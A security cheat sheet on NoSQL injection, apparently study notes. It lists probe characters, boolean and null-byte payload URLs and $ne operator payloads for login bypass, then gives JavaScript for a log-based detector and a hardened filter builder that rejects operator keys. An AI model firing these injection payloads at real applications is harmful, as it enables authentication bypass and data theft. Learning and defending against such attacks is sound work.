# What is NoSQL

NoSQL refers to a category of database systems that are designed to handle large-scale data storage and retrieval while allowing for flexible data models. Unlike traditional relational databases (SQL), which use structured tables and predefined schemas, NoSQL databases are schema-less or have dynamic schemas, making them more adaptable to certain types of data and use cases.


# Detecting NoSQL

## Characters that can cause NoSQL injection
'"`{ ;$Foo} $Foo \xYZ

The same characters URL-encoded in a query parameter (with CRLF and a trailing null byte added):

https://insecure-website.com/product/lookup?category='%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00

## Once you have identified that there is a NoSQL database, identify the specific character

this.category == '''      ---> should return an error (the extra quote breaks the string)
this.category == '\''     ---> should not return an error (the quote is escaped)

## Conditional behavior (' && 0 && 'x versus ' && 1 && 'x)

Conditional statements: ' && 0 && 'x and ' && 1 && 'x. If the two responses differ, the injected condition is being evaluated by the query.

' && 1 == 1
' && '1' == '1
' || 1==1
' || 1 ||
' || 1 || '
' || '1' == '1

https://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x
https://insecure-website.com/product/lookup?category=fizzy'+%26%26+1+%26%26+'x
...

## Comments

MongoDB may ignore all characters after a null character, so a null byte injected into a string cuts off the rest of the query.

ex: this.category == 'fizzy' && this.released == 1
    this.category == 'fizzy'\u0000' && this.released == 1   ---> everything after \u0000 is ignored, so the released == 1 check is dropped

https://insecure-website.com/product/lookup?category=fizzy'%00
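The probe characters, the `&&`/`||` conditional payloads and the null-byte truncation described in the sections above all leave a recognisable trace in request logs. The following is an added example (not part of the original notes) of detection logic that decodes the query string of each request and flags those traits; it runs offline over constructed access-log lines built from the URLs quoted above. The log line format, the client IP, the `/login` path and the function names are this example's own assumptions.

```javascript
// Added example, not part of the original notes: detection logic for the probe
// characters, conditional payloads and null-byte truncation listed above, run
// over constructed access-log lines. Log format, IP and helper names are this
// example's own assumptions.

// Each pattern corresponds to a technique in the notes above.
const PROBE_PATTERNS = [
  { name: 'quote-or-backtick',  re: /['"`]/ },             // string-context breakout
  { name: 'brace-or-semicolon', re: /[{};]/ },             // JavaScript syntax in $where
  { name: 'dollar-variable',    re: /\$\w+/ },             // $Foo style variables
  { name: 'hex-escape',         re: /\\x[0-9a-zA-Z]{2}/ }, // \xYZ escapes
  { name: 'null-byte',          re: /\u0000/ },            // %00 truncation
  { name: 'boolean-condition',  re: /&&|\|\|/ },           // ' && 1 && 'x style probes
];

// Parse one constructed log line of the form: <ip> "GET <absolute-url>"
// and return the path plus every pattern that matched a query parameter.
function scanRequest(line) {
  const m = line.match(/"GET (\S+)"/);
  if (!m) return null;
  let url;
  try {
    url = new URL(m[1]);
  } catch {
    return null; // malformed URL: nothing to inspect
  }
  const findings = [];
  for (const [key, value] of url.searchParams) { // values are percent-decoded here
    for (const { name, re } of PROBE_PATTERNS) {
      if (re.test(value)) findings.push({ param: key, pattern: name });
    }
    // username[$ne]=... : the operator sits in the parameter name, not the value
    if (/\[\$\w+\]$/.test(key)) findings.push({ param: key, pattern: 'operator-in-param-name' });
  }
  return { path: url.pathname, findings };
}

// Return only the requests that triggered at least one pattern.
function scanLog(lines) {
  return lines.map(scanRequest).filter((r) => r && r.findings.length > 0);
}

// Constructed sample log; the URLs are the ones quoted in the notes above.
const SAMPLE_LOG = [
  `203.0.113.5 "GET https://insecure-website.com/product/lookup?category=fizzy"`,
  `203.0.113.5 "GET https://insecure-website.com/product/lookup?category=fizzy'+%26%26+0+%26%26+'x"`,
  `203.0.113.5 "GET https://insecure-website.com/product/lookup?category=fizzy'%00"`,
  `203.0.113.5 "GET https://insecure-website.com/login?username[$ne]=invalid"`,
  `203.0.113.5 "GET https://insecure-website.com/product/lookup?category='%22%60%7b%0d%0a%3b%24Foo%7d%0d%0a%24Foo%20%5cxYZ%00"`,
];

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.path, hit.findings.map((f) => `${f.param}:${f.pattern}`).join(' '));
}
```

The scan inspects the percent-decoded parameter values rather than the raw URL, so `%00` and `%26%26` are matched as the null byte and `&&` they become inside the application; the bracketed-operator check is applied to the parameter name, because that is where `username[$ne]` carries the operator. A single quote in a product category is a weak signal on its own, so in practice the boolean-condition, null-byte and operator-in-name findings are the ones worth alerting on.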

---------------------------------------------------------------------------------

## NoSQL operator injection

- $where  - Matches documents that satisfy a JavaScript expression.
- $ne     - Matches all values that are not equal to a specified value.
- $in     - Matches all of the values specified in an array.
- $regex  - Selects documents where values match a specified regular expression.

In JSON messages, you can insert query operators as nested objects: `{"username":"wiener"}` becomes `{"username":{"$ne":"invalid"}}`.

For URL-based inputs, you can insert query operators via URL parameters:
username=wiener ---> becomes ---> username[$ne]=invalid
 |----> If this does not work, try sending the same input as a JSON body in a POST request.
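Both channels above end up as the same thing on the server: a nested object with a `$`-prefixed key that the driver interprets as an operator instead of a literal value. The following is an added example (not the original notes' code and not any library's API) that shows the filter object a vulnerable handler would build from each channel and a hardened builder that rejects it. No database is involved; `buildFilterUnsafe` and `buildFilterSafe` return the filter a handler would pass to `collection.findOne()`. The bracket parser, the `/login` handler shape and all function names are this example's own assumptions.

```javascript
// Added example, not part of the original notes: how an operator such as $ne
// reaches a MongoDB filter from both channels described above (JSON body and
// bracketed URL parameter), and a guard that rejects it. No database is used:
// the build*() functions return the filter object a handler would pass to
// collection.findOne(). All function names here are this example's own.

// Minimal qs-style parser for "name[sub]=value" keys, written here so the URL
// channel can be shown offline; bracket-aware query/body parsers used by web
// frameworks produce the same nested object.
function parseBracketParams(query) {
  const out = {};
  for (const [rawKey, value] of new URLSearchParams(query)) {
    const m = rawKey.match(/^([^[\]]+)\[([^[\]]+)\]$/);
    if (m) {
      out[m[1]] = Object.assign(out[m[1]] || {}, { [m[2]]: value });
    } else {
      out[rawKey] = value;
    }
  }
  return out;
}

// True if any key at any depth starts with '$', i.e. the object would be
// interpreted as a query operator rather than a literal value.
function filterUsesOperator(value) {
  if (!value || typeof value !== 'object') return false;
  return Object.keys(value).some(
    (k) => k.startsWith('$') || filterUsesOperator(value[k]),
  );
}

// Vulnerable: user-controlled values are copied into the filter unchanged, so
// {"$ne": "invalid"} becomes a condition that matches every document.
function buildFilterUnsafe(input) {
  return { username: input.username, password: input.password };
}

function requireString(value, name) {
  if (typeof value !== 'string') {
    throw new TypeError(`${name} must be a string, got ${typeof value}`);
  }
  return value;
}

// Hardened: reject any operator key up front, then only ever place plain
// strings in the filter. Both the JSON and URL channels fail the same way.
function buildFilterSafe(input) {
  if (filterUsesOperator(input)) {
    throw new TypeError('request contains a query operator');
  }
  return {
    username: requireString(input.username, 'username'),
    password: requireString(input.password, 'password'),
  };
}

// Constructed inputs: the JSON form and the URL form from the notes above.
const jsonBody = JSON.parse('{"username":{"$ne":"invalid"},"password":{"$ne":"invalid"}}');
const urlBody = parseBracketParams('username[$ne]=invalid&password[$ne]=invalid');

for (const [label, body] of [['json', jsonBody], ['url', urlBody]]) {
  console.log(label, 'unsafe filter uses operator:', filterUsesOperator(buildFilterUnsafe(body)));
  try {
    buildFilterSafe(body);
  } catch (e) {
    console.log(label, 'safe builder rejected it:', e.message);
  }
}
```

The type check in `requireString` is what actually stops the login bypass, since `$ne` can only arrive as an object; the recursive `filterUsesOperator` check is there for handlers that legitimately accept nested documents, where a stray `$`-prefixed key deep inside the input would otherwise be passed straight to the driver. Sanitising middleware that strips or rejects `$`-prefixed keys applies the same idea to every request before it reaches a handler.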